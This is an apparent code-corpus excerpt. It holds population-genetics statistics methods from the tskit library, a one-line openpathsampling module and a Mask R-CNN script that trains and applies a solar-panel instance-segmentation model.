diversities = self._ll_tree_sequence.diversity(
sample_set_sizes, flattened, **kwargs
)
divergences = self._ll_tree_sequence.divergence(
sample_set_sizes, flattened, indexes, **kwargs
)
orig_shape = divergences.shape
# "node" statistics produce a 3D array
if len(divergences.shape) == 2:
divergences.shape = (divergences.shape[0], 1, divergences.shape[1])
diversities.shape = (diversities.shape[0], 1, diversities.shape[1])
fst = np.repeat(1.0, np.product(divergences.shape))
fst.shape = divergences.shape
for i, (u, v) in enumerate(indexes):
denom = (
diversities[:, :, u]
+ diversities[:, :, v]
+ 2 * divergences[:, :, i]
)
with np.errstate(divide="ignore", invalid="ignore"):
fst[:, :, i] -= (
2 * (diversities[:, :, u] + diversities[:, :, v]) / denom
)
fst.shape = orig_shape
return fst
return self.__k_way_sample_set_stat(
fst_func,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def Y3(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes the 'Y' statistic between triples of sets of nodes from ``sample_sets``.
Operates on ``k = 3`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each is an average across
randomly chosen trios of samples ``(a, b, c)``, one from each sample set:
"site"
The average density of sites at which ``a`` differs from ``b`` and
``c``, per unit of chromosome length.
"branch"
The average length of all branches that separate ``a`` from ``b``
and ``c`` (in units of time).
"node"
For each node, the average proportion of the window on which ``a``
inherits from that node but ``b`` and ``c`` do not, or vice-versa.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 3-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.Y3,
3,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def Y2(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes the 'Y2' statistic between pairs of sets of nodes from ``sample_sets``.
Operates on ``k = 2`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each is computed exactly as
``Y3``, except that the average across randomly chosen trios of samples
``(a, b1, b2)``, where ``a`` is chosen from the first sample set, and
``b1, b2`` are chosen (without replacement) from the second sample set.
See :meth:`Y3 <.TreeSequence.Y3>` for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 2-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.Y2,
2,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def Y1(self, sample_sets, windows=None, mode="site", span_normalise=True):
"""
Computes the 'Y1' statistic within each of the sets of nodes given by
``sample_sets``.
Please see the :ref:`one-way statistics <sec_stats_sample_sets_one_way>`
section for details on how the ``sample_sets`` argument is interpreted
and how it interacts with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`, :ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
Operates on ``k = 1`` sample set at a time.
What is computed depends on ``mode``. Each is computed exactly as
``Y3``, except that the average is across a randomly chosen trio of
samples ``(a1, a2, a3)`` all chosen without replacement from the same
sample set. See :meth:`Y3 <.TreeSequence.Y3>` for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__one_way_sample_set_stat(
self._ll_tree_sequence.Y1,
sample_sets,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def f4(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes Patterson's f4 statistic between four groups of nodes from
``sample_sets``.
Operates on ``k = 4`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each is an average across
randomly chosen set of four samples ``(a, b; c, d)``, one from each sample set:
"site"
The average density of sites at which ``a`` and ``c`` agree but
differs from ``b`` and ``d``, minus the average density of sites at
which ``a`` and ``d`` agree but differs from ``b`` and ``c``, per
unit of chromosome length.
"branch"
The average length of all branches that separate ``a`` and ``c``
from ``b`` and ``d``, minus the average length of all branches that
separate ``a`` and ``d`` from ``b`` and ``c`` (in units of time).
"node"
For each node, the average proportion of the window on which ``a`` and ``c``
inherit from that node but ``b`` and ``d`` do not, or vice-versa,
minus the average proportion of the window on which ``a`` anc ``d``
inherit from that node but ``b`` and ``c`` do not, or vice-versa.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 4-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.f4,
4,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
def f3(
self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
):
"""
Computes Patterson's f3 statistic between three groups of nodes from
``sample_sets``.
Operates on ``k = 3`` sample sets at a time; please see the
:ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
section for details on how the ``sample_sets`` and ``indexes`` arguments are
interpreted and how they interact with the dimensions of the output array.
See the :ref:`statistics interface <sec_stats_interface>` section for details on
:ref:`windows <sec_stats_windows>`,
:ref:`mode <sec_stats_mode>`,
:ref:`span normalise <sec_stats_span_normalise>`,
and :ref:`return value <sec_stats_output_format>`.
What is computed depends on ``mode``. Each works exactly as
:meth:`f4 <.TreeSequence.f4>`, except the average is across randomly
chosen set of four samples ``(a1, b; a2, c)``, with `a1` and `a2` both
chosen (without replacement) from the first sample set. See
:meth:`f4 <.TreeSequence.f4>` for more details.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:param list indexes: A list of 3-tuples, or None.
:param list windows: An increasing list of breakpoints between the windows
to compute the statistic in.
:param str mode: A string giving the "type" of the statistic to be computed
(defaults to "site").
:param bool span_normalise: Whether to divide the result by the span of the
window (defaults to True).
:return: A ndarray with shape equal to (num windows, num statistics).
"""
return self.__k_way_sample_set_stat(
self._ll_tree_sequence.f3,
3,
sample_sets,
indexes=indexes,
windows=windows,
mode=mode,
span_normalise=span_normalise,
)
    def f2(
        self, sample_sets, indexes=None, windows=None, mode="site", span_normalise=True
    ):
        """
        Computes Patterson's f2 statistic between two groups of nodes from
        ``sample_sets``.
        Operates on ``k = 2`` sample sets at a time; please see the
        :ref:`multi-way statistics <sec_stats_sample_sets_multi_way>`
        section for details on how the ``sample_sets`` and ``indexes`` arguments are
        interpreted and how they interact with the dimensions of the output array.
        See the :ref:`statistics interface <sec_stats_interface>` section for details on
        :ref:`windows <sec_stats_windows>`,
        :ref:`mode <sec_stats_mode>`,
        :ref:`span normalise <sec_stats_span_normalise>`,
        and :ref:`return value <sec_stats_output_format>`.
        What is computed depends on ``mode``. Each works exactly as
        :meth:`f4 <.TreeSequence.f4>`, except the average is across randomly
        chosen set of four samples ``(a1, b1; a2, b2)``, with `a1` and `a2`
        both chosen (without replacement) from the first sample set and ``b1``
        and ``b2`` chosen randomly without replacement from the second sample
        set. See :meth:`f4 <.TreeSequence.f4>` for more details.
        :param list sample_sets: A list of lists of Node IDs, specifying the
            groups of nodes to compute the statistic with.
        :param list indexes: A list of 2-tuples, or None.
        :param list windows: An increasing list of breakpoints between the windows
            to compute the statistic in.
        :param str mode: A string giving the "type" of the statistic to be computed
            (defaults to "site").
        :param bool span_normalise: Whether to divide the result by the span of the
            window (defaults to True).
        :return: A ndarray with shape equal to (num windows, num statistics).
        """
        # Two-way variant of f4, delegated to the generic k-way machinery.
        return self.__k_way_sample_set_stat(
            self._ll_tree_sequence.f2,
            2,
            sample_sets,
            indexes=indexes,
            windows=windows,
            mode=mode,
            span_normalise=span_normalise,
        )
def mean_descendants(self, sample_sets):
"""
Computes for every node the mean number of samples in each of the
`sample_sets` that descend from that node, averaged over the
portions of the genome for which the node is ancestral to *any* sample.
The output is an array, `C[node, j]`, which reports the total span of
all genomes in `sample_sets[j]` that inherit from `node`, divided by
the total span of the genome on which `node` is an ancestor to any
sample in the tree sequence.
.. warning:: The interface for this method is preliminary and may be subject to
backwards incompatible changes in the near future. The long-term stable
API for this method will be consistent with other :ref:`sec_stats`.
In particular, the normalization by proportion of the genome that `node`
is an ancestor to anyone may not be the default behaviour in the future.
:param list sample_sets: A list of lists of node IDs.
:return: An array with dimensions (number of nodes in the tree sequence,
number of reference sets)
"""
return self._ll_tree_sequence.mean_descendants(sample_sets)
def genealogical_nearest_neighbours(self, focal, sample_sets, num_threads=0):
"""
Return the genealogical nearest neighbours (GNN) proportions for the given
focal nodes, with reference to two or more sets of interest, averaged over all
trees in the tree sequence.
The GNN proportions for a focal node in a single tree are given by first finding
the most recent common ancestral node :math:`a` between the focal node and any
other node present in the reference sets. The GNN proportion for a specific
reference set, :math:`S` is the number of nodes in :math:`S` that descend from
:math:`a`, as a proportion of the total number of descendant nodes in any of the
reference sets.
For example, consider a case with 2 sample sets, :math:`S_1` and :math:`S_2`.
For a given tree, :math:`a` is the node that includes at least one descendant in
:math:`S_1` or :math:`S_2` (not including the focal node). If the descendants of
:math:`a` include some nodes in :math:`S_1` but no nodes in :math:`S_2`, then the
GNN proportions for that tree will be 100% :math:`S_1` and 0% :math:`S_2`, or
:math:`[1.0, 0.0]`.
For a given focal node, the GNN proportions returned by this function are an
average of the GNNs for each tree, weighted by the genomic distance spanned by
that tree.
For an precise mathematical definition of GNN, see https://doi.org/10.1101/458067
.. note:: The reference sets need not include all the samples, hence the most
recent common ancestral node of the reference sets, :math:`a`, need not be
the immediate ancestor of the focal node. If the reference sets only comprise
sequences from relatively distant individuals, the GNN statistic may end up
as a measure of comparatively distant ancestry, even for tree sequences that
contain many closely related individuals.
.. warning:: The interface for this method is preliminary and may be subject to
backwards incompatible changes in the near future. The long-term stable
API for this method will be consistent with other :ref:`sec_stats`.
:param list focal: A list of :math:`n` nodes whose GNNs should be calculated.
:param list sample_sets: A list of :math:`m` lists of node IDs.
:return: An :math:`n` by :math:`m` array of focal nodes by GNN proportions.
Every focal node corresponds to a row. The numbers in each
row corresponding to the GNN proportion for each of the passed-in reference
sets. Rows therefore sum to one.
:rtype: numpy.ndarray
"""
# TODO add windows=None option: https://github.com/tskit-dev/tskit/issues/193
if num_threads <= 0:
return self._ll_tree_sequence.genealogical_nearest_neighbours(
focal, sample_sets
)
else:
worker = functools.partial(
self._ll_tree_sequence.genealogical_nearest_neighbours,
reference_sets=sample_sets,
)
focal = util.safe_np_int_cast(focal, np.int32)
splits = np.array_split(focal, num_threads)
with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as pool:
arrays = pool.map(worker, splits)
return np.vstack(list(arrays))
def kc_distance(self, other, lambda_=0.0):
"""
Returns the average :meth:`Tree.kc_distance` between pairs of trees along
the sequence whose intervals overlap. The average is weighted by the
fraction of the sequence on which each pair of trees overlap.
:param TreeSequence other: The other tree sequence to compare to.
:param float lambda_: The KC metric lambda parameter determining the
relative weight of topology and branch length.
:return: The computed KC distance between this tree sequence and other.
:rtype: float
"""
return self._ll_tree_sequence.get_kc_distance(other._ll_tree_sequence, lambda_)
def count_topologies(self, sample_sets=None):
"""
Returns a generator that produces the same distribution of topologies as
:meth:`Tree.count_topologies` but sequentially for every tree in a tree
sequence. For use on a tree sequence this method is much faster than
computing the result independently per tree.
.. warning:: The interface for this method is preliminary and may be subject to
backwards incompatible changes in the near future.
:param list sample_sets: A list of lists of Node IDs, specifying the
groups of nodes to compute the statistic with.
:rtype: iter(:class:`tskit.TopologyCounter`)
:raises ValueError: If nodes in ``sample_sets`` are invalid or are
internal samples.
"""
if sample_sets is None:
sample_sets = [
self.samples(population=pop.id) for pop in self.populations()
]
yield from combinatorics.treeseq_count_topologies(self, sample_sets)
############################################
#
# Deprecated APIs. These are either already unsupported, or will be unsupported in a
# later release.
#
############################################
def get_pairwise_diversity(self, samples=None):
# Deprecated alias for self.pairwise_diversity
return self.pairwise_diversity(samples)
def pairwise_diversity(self, samples=None):
"""
Returns the pairwise nucleotide site diversity, the average number of sites
that differ between a randomly chosen pair of samples. If `samples` is
specified, calculate the diversity within this set.
.. deprecated:: 0.2.0
please use :meth:`.diversity` instead. Since version 0.2.0 the error
semantics have also changed slightly. It is no longer an error
when there is one sample and a tskit.LibraryError is raised
when non-sample IDs are provided rather than a ValueError. It is
also no longer an error to compute pairwise diversity at sites
with multiple mutations.
:param list samples: The set of samples within which we calculate
the diversity. If None, calculate diversity within the entire sample.
:return: The pairwise nucleotide site diversity.
:rtype: float
"""
if samples is None:
samples = self.samples()
return float(
self.diversity(
[samples], windows=[0, self.sequence_length], span_normalise=False
)[0]
)
def get_time(self, u):
# Deprecated. Use ts.node(u).time
if u < 0 or u >= self.get_num_nodes():
raise ValueError("ID out of bounds")
node = self.node(u)
return node.time
def get_population(self, u):
# Deprecated. Use ts.node(u).population
if u < 0 or u >= self.get_num_nodes():
raise ValueError("ID out of bounds")
node = self.node(u)
return node.population
def records(self):
# Deprecated. Use either ts.edges() or ts.edgesets().
t = [node.time for node in self.nodes()]
pop = [node.population for node in self.nodes()]
for e in self.edgesets():
yield CoalescenceRecord(
e.left, e.right, e.parent, e.children, t[e.parent], pop[e.parent]
)
# Unsupported old methods.
def get_num_records(self):
raise NotImplementedError(
"This method is no longer supported. Please use the "
"TreeSequence.num_edges if possible to work with edges rather "
"than coalescence records. If not, please use len(list(ts.edgesets())) "
"which should return the number of coalescence records, as previously "
"defined. Please open an issue on GitHub if this is "
"important for your workflow."
)
def diffs(self):
raise NotImplementedError(
"This method is no longer supported. Please use the "
"TreeSequence.edge_diffs() method instead"
)
def newick_trees(self, precision=3, breakpoints=None, Ne=1):
raise NotImplementedError(
"This method is no longer supported. Please use the Tree.newick"
" method instead"
)
def write_ms(
    tree_sequence,
    output,
    print_trees=False,
    precision=4,
    num_replicates=1,
    write_header=True,
):
    """
    Write ``ms`` formatted output from the genotypes of a tree sequence
    or an iterator over tree sequences. Usage:
    .. code-block:: python
        tree_sequence = msprime.simulate(
            sample_size=sample_size,
            Ne=Ne,
            length=length,
            mutation_rate=mutation_rate,
            recombination_rate=recombination_rate,
            random_seed=random_seed,
            num_replicates=num_replicates,
        )
        with open("output.ms", "w") as ms_file:
            tskit.write_ms(tree_sequence, ms_file)
    The first line of this ms-style output has two arguments: the sample
    size and the number of replicates. The second line has a ``0`` as a
    substitute for the random seed.
    :param ts tree_sequence: The tree sequence (or iterator over tree
        sequences) to write to ms file
    :param io.IOBase output: The file-like object to write the ms-style output
    :param bool print_trees: Boolean parameter to write out newick format trees
        to output [optional]
    :param int precision: Numerical precision with which to write the ms
        output [optional]
    :param int num_replicates: Number of replicates simulated [required if
        num_replicates used in simulation]
    :param bool write_header: Boolean parameter to write out the header.
        [optional]
    :raises ValueError: If the tree sequence contains non-biallelic sites,
        which cannot be represented in the 0/1 ms haplotype format.
    """
    if not isinstance(tree_sequence, collections.abc.Iterable):
        # Allow a single tree sequence to be passed directly.
        tree_sequence = [tree_sequence]
    for replicate_index, tree_seq in enumerate(tree_sequence):
        # Only the first replicate carries the header.
        if replicate_index > 0:
            write_header = False
        if write_header:
            print(f"ms {tree_seq.sample_size} {num_replicates}", file=output)
            # ms writes the random seed(s) here; we have none, so write 0.
            print("0", file=output)
        print(file=output)
        print("//", file=output)
        if print_trees:
            # Write the marginal trees in newick format.
            # NOTE(review): relies on tree_seq.trees() supporting len() --
            # confirm, or use tree_seq.num_trees.
            if len(tree_seq.trees()) == 1:
                tree = next(tree_seq.trees())
                print(tree.newick(precision=precision), file=output)
            else:
                for tree in tree_seq.trees():
                    newick = tree.newick(precision=precision)
                    print(f"[{tree.span:.{precision}f}]", newick, file=output)
        else:
            num_sites = tree_seq.get_num_sites()
            print("segsites:", num_sites, file=output)
            if num_sites == 0:
                print(file=output)
            else:
                # Site positions are scaled into [0, 1] as ms does.
                print("positions: ", end="", file=output)
                for variant in tree_seq.variants():
                    scaled = variant.position / tree_seq.sequence_length
                    print(f"{scaled:.{precision}f}", end=" ", file=output)
                print(file=output)
                # One haplotype row per sample; sites are matrix rows, so
                # take column k for sample k.
                genotypes = tree_seq.genotype_matrix()
                for k in range(tree_seq.num_samples):
                    haplotype = "".join(map(str, genotypes[:, k]))
                    if not set(haplotype).issubset({"0", "1", "-"}):
                        # Fixed: the original message concatenated to
                        # "non-biallelicSNPs" (missing space).
                        raise ValueError(
                            "This tree sequence contains non-biallelic "
                            "SNPs and is incompatible with the ms format!"
                        )
                    print(haplotype, file=output)
| 43.087498 | 93 | 0.622987 |
0e8bc232328a495f44230c1b42b591a37ece2c7a | 54 | py | Python | openpathsampling/pathmovers/move_schemes.py | bolhuis/openpathsampling | 4a12af0ee1143cdbc272b10a8c7cbea735566ce1 | [
"MIT"
] | 64 | 2016-07-06T13:38:51.000Z | 2022-03-30T15:58:01.000Z | openpathsampling/pathmovers/move_schemes.py | bolhuis/openpathsampling | 4a12af0ee1143cdbc272b10a8c7cbea735566ce1 | [
"MIT"
] | 601 | 2016-06-13T10:22:01.000Z | 2022-03-25T00:10:40.000Z | openpathsampling/pathmovers/move_schemes.py | hejung/openpathsampling | e8b091c92916561954542d40d17d7241b203d1ad | [
"MIT"
] | 45 | 2016-11-10T11:17:53.000Z | 2022-02-13T11:50:26.000Z | from .spring_shooting import SpringShootingMoveScheme
| 27 | 53 | 0.907407 |
c70bf818563fc3b0721b90235086541a8e4a140f | 13,955 | py | Python | mrcnn/custom.py | SmritiBahuguna/MaskRCNN_SolarPanel | 35525bbc493842b110b47b49b04e1ffc2d82df43 | [
"Apache-2.0"
] | null | null | null | mrcnn/custom.py | SmritiBahuguna/MaskRCNN_SolarPanel | 35525bbc493842b110b47b49b04e1ffc2d82df43 | [
"Apache-2.0"
] | null | null | null | mrcnn/custom.py | SmritiBahuguna/MaskRCNN_SolarPanel | 35525bbc493842b110b47b49b04e1ffc2d82df43 | [
"Apache-2.0"
] | null | null | null | """
Mask R-CNN
Train on the toy Balloon dataset and implement color splash effect.
Copyright (c) 2018 Matterport, Inc.
Licensed under the MIT License (see LICENSE for details)
Written by Waleed Abdulla
------------------------------------------------------------
Usage: import the module (see Jupyter notebooks for examples), or run from
the command line as such:
# Train a new model starting from pre-trained COCO weights
python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=coco
# Resume training a model that you had trained earlier
python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=last
# Train a new model starting from ImageNet weights
python3 balloon.py train --dataset=/path/to/balloon/dataset --weights=imagenet
# Apply color splash to an image
python3 balloon.py splash --weights=/path/to/weights/file.h5 --image=<URL or path to file>
# Apply color splash to video using the last weights you trained
python3 balloon.py splash --weights=last --video=<URL or path to file>
"""
import os
import sys
import json
import datetime
import numpy as np
import skimage.draw
#import cv2
#from mrcnn.visualize import display_instances
import matplotlib.pyplot as plt
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import model as modellib, utils
# Path to trained weights file
COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Directory to save logs and model checkpoints, if not provided
# through the command line argument --logs
DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs")
############################################################
# Configurations
############################################################
class CustomConfig(Config):
    """Configuration for training on the solar-panel dataset.
    Derives from the base Config class and overrides some values.
    """
    # Give the configuration a recognizable name.
    NAME = "solar panel"
    # Images processed per GPU per step; sized for a 12GB GPU.
    # Adjust down if you use a smaller GPU.
    IMAGES_PER_GPU = 2
    # Number of classes (including background).
    NUM_CLASSES = 1 + 1 # Background + solar panel
    # Number of training steps per epoch.
    STEPS_PER_EPOCH = 100
    # Skip detections with < 90% confidence.
    DETECTION_MIN_CONFIDENCE = 0.9
############################################################
# Dataset
############################################################
class CustomDataset(utils.Dataset):
    """Dataset wrapper for VIA-annotated "solar panel" images."""

    def load_custom(self, dataset_dir, subset):
        """Load a subset of the dataset.

        dataset_dir: Root directory of the dataset.
        subset: Subset to load: "train" or "val".
        """
        # Single foreground class.
        self.add_class("solar panel", 1, "solar panel")

        assert subset in ["train", "val"]
        dataset_dir = os.path.join(dataset_dir, subset)

        # VGG Image Annotator stores one entry per image:
        # { 'filename': '...jpg',
        #   'regions': { '0': {'shape_attributes': {'all_points_x': [...],
        #                                           'all_points_y': [...],
        #                                           'name': 'polygon'}, ...}, ... },
        #   'size': ... }
        # We only need the polygon x/y coordinates of each region.
        # NOTE(review): assumes the JSON top level is a list of entries; some
        # VIA exports use a dict keyed by filename — confirm export format.
        with open(os.path.join(dataset_dir, "via_region_data.json")) as fh:
            annotations = json.load(fh)

        # VIA saves images even when they have no annotations; skip those.
        annotations = [a for a in annotations if a['regions']]

        for a in annotations:
            # Polygon outlines of every object instance in this image.
            polygons = [r['shape_attributes'] for r in a['regions']]

            # VIA does not record image size, so read the image to get it.
            # Only manageable because the dataset is tiny.
            image_path = os.path.join(dataset_dir, a['filename'])
            image = skimage.io.imread(image_path)
            height, width = image.shape[:2]

            self.add_image(
                "solar panel",  # source name for this single-class dataset
                image_id=a['filename'],  # filename doubles as unique image id
                path=image_path,
                width=width, height=height,
                polygons=polygons)

    def load_mask(self, image_id):
        """Generate instance masks for an image.

        Returns:
            masks: bool array [height, width, instance count], one mask per instance.
            class_ids: 1D int32 array of class IDs (all 1s: single class).
        """
        info = self.image_info[image_id]
        # Delegate images that don't belong to this dataset to the parent class.
        if info["source"] != "solar panel":
            return super().load_mask(image_id)

        # Rasterize each polygon into its own channel of the mask volume.
        mask = np.zeros([info["height"], info["width"], len(info["polygons"])],
                        dtype=np.uint8)
        for i, p in enumerate(info["polygons"]):
            rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x'])
            mask[rr, cc, i] = 1

        # np.bool was removed in NumPy 1.24; the builtin bool is the replacement.
        return mask.astype(bool), np.ones([mask.shape[-1]], dtype=np.int32)

    def image_reference(self, image_id):
        """Return the path of the image."""
        info = self.image_info[image_id]
        if info["source"] == "solar panel":
            return info["path"]
        # Fix: propagate the parent's value (the original dropped the return,
        # yielding None for foreign sources).
        return super().image_reference(image_id)
def train(model):
    """Train *model*'s network heads on the dataset named by the module-level ``args``."""
    # Build and prepare the training split.
    train_set = CustomDataset()
    train_set.load_custom(args.dataset, "train")
    train_set.prepare()

    # Build and prepare the validation split.
    val_set = CustomDataset()
    val_set.load_custom(args.dataset, "val")
    val_set.prepare()

    # Starting from COCO weights on a tiny dataset, a short run over just the
    # network heads is sufficient; adapt the schedule for larger datasets.
    print("Training network heads")
    model.train(train_set, val_set,
                learning_rate=config.LEARNING_RATE,
                epochs=15,
                layers='heads')
def color_splash(image, mask):
    """Return *image* in color where *mask* is set, grayscale elsewhere.

    image: RGB image [height, width, 3]
    mask: instance segmentation mask [height, width, instance count]
    """
    # Grayscale copy kept as 3 identical RGB channels, scaled back to 0-255.
    grayscale = skimage.color.gray2rgb(skimage.color.rgb2gray(image)) * 255
    # Treat all instances as one: collapse into a single [H, W, 1] boolean layer.
    combined = np.sum(mask, -1, keepdims=True) >= 1
    if combined.shape[0] == 0:
        return grayscale
    # Copy color pixels from the original wherever the mask is set.
    return np.where(combined, image, grayscale).astype(np.uint8)
def detect_and_color_splash(model, image_path=None, video_path=None):
    """Run detection with *model* and save a color-splash rendering.

    Exactly one of image_path / video_path should be provided.
    Writes splash_<timestamp>.png (image) or splash_<timestamp>.avi (video)
    to the current working directory.
    """
    assert image_path or video_path
    if image_path:
        # Fix: use the image_path parameter (the original read the module-level
        # args.image, silently ignoring the argument passed by the caller).
        print("Running on {}".format(image_path))
        image = skimage.io.imread(image_path)
        # Detect objects
        r = model.detect([image], verbose=1)[0]
        # Color splash
        splash = color_splash(image, r['masks'])
        # Save output
        file_name = "splash_{:%Y%m%dT%H%M%S}.png".format(datetime.datetime.now())
        skimage.io.imsave(file_name, splash)
    elif video_path:
        import cv2
        # Video capture
        vcapture = cv2.VideoCapture(video_path)
        width = int(vcapture.get(cv2.CAP_PROP_FRAME_WIDTH))
        height = int(vcapture.get(cv2.CAP_PROP_FRAME_HEIGHT))
        fps = vcapture.get(cv2.CAP_PROP_FPS)
        # Define codec and create video writer
        file_name = "splash_{:%Y%m%dT%H%M%S}.avi".format(datetime.datetime.now())
        vwriter = cv2.VideoWriter(file_name,
                                  cv2.VideoWriter_fourcc(*'MJPG'),
                                  fps, (width, height))
        count = 0
        success = True
        while success:
            print("frame: ", count)
            # Read next frame; success goes False at end of stream.
            success, image = vcapture.read()
            if success:
                # OpenCV returns images as BGR; the model expects RGB.
                image = image[..., ::-1]
                r = model.detect([image], verbose=0)[0]
                splash = color_splash(image, r['masks'])
                # RGB -> BGR to write back out with OpenCV.
                splash = splash[..., ::-1]
                vwriter.write(splash)
            count += 1
        vwriter.release()
    print("Saved to ", file_name)
############################################################
# Training
############################################################
if __name__ == '__main__':
    import argparse
    # Parse command line arguments.
    parser = argparse.ArgumentParser(
        description='Train Mask R-CNN to detect solar panels.')
    parser.add_argument("command",
                        metavar="<command>",
                        help="'train' or 'splash'")
    parser.add_argument('--dataset', required=False,
                        metavar="/path/to/solar panel/dataset/",
                        help='Directory of the solar panel dataset')
    parser.add_argument('--weights', required=True,
                        metavar="/path/to/weights.h5",
                        help="Path to weights .h5 file or 'coco'")
    parser.add_argument('--logs', required=False,
                        default=DEFAULT_LOGS_DIR,
                        metavar="/path/to/logs/",
                        help='Logs and checkpoints directory (default=logs/)')
    parser.add_argument('--image', required=False,
                        metavar="path or URL to image",
                        help='Image to apply the color splash effect on')
    parser.add_argument('--video', required=False,
                        metavar="path or URL to video",
                        help='Video to apply the color splash effect on')
    args = parser.parse_args()
    # Validate argument combinations per command.
    if args.command == "train":
        assert args.dataset, "Argument --dataset is required for training"
    elif args.command == "splash":
        assert args.image or args.video,\
               "Provide --image or --video to apply color splash"
    print("Weights: ", args.weights)
    print("Dataset: ", args.dataset)
    print("Logs: ", args.logs)
    # Select configuration: full batch config for training, batch=1 otherwise.
    if args.command == "train":
        config = CustomConfig()
    else:
        class InferenceConfig(CustomConfig):
            # Set batch size to 1 since we'll be running inference on
            # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
            GPU_COUNT = 1
            IMAGES_PER_GPU = 1
        config = InferenceConfig()
    config.display()
    # Build the model in the matching mode.
    if args.command == "train":
        model = modellib.MaskRCNN(mode="training", config=config,
                                  model_dir=args.logs)
    else:
        model = modellib.MaskRCNN(mode="inference", config=config,
                                  model_dir=args.logs)
    # Resolve which weights file to load; 'coco'/'last'/'imagenet' are special.
    if args.weights.lower() == "coco":
        weights_path = COCO_WEIGHTS_PATH
        # Download the COCO weights file on first use.
        if not os.path.exists(weights_path):
            utils.download_trained_weights(weights_path)
    elif args.weights.lower() == "last":
        # Resume from the most recent checkpoint in the logs directory.
        weights_path = model.find_last()[1]
    elif args.weights.lower() == "imagenet":
        # Start from ImageNet trained weights.
        weights_path = model.get_imagenet_weights()
    else:
        weights_path = args.weights
    # Load weights into the model.
    print("Loading weights ", weights_path)
    if args.weights.lower() == "coco":
        # Exclude the last layers because they require a matching
        # number of classes (COCO has 81, this model has 2).
        model.load_weights(weights_path, by_name=True, exclude=[
            "mrcnn_class_logits", "mrcnn_bbox_fc",
            "mrcnn_bbox", "mrcnn_mask"])
    else:
        model.load_weights(weights_path, by_name=True)
    # Dispatch on the requested command.
    if args.command == "train":
        train(model)
    elif args.command == "splash":
        detect_and_color_splash(model, image_path=args.image,
                                video_path=args.video)
    else:
        print("'{}' is not recognized. "
              "Use 'train' or 'splash'".format(args.command))
| 37.716216 | 105 | 0.590684 |
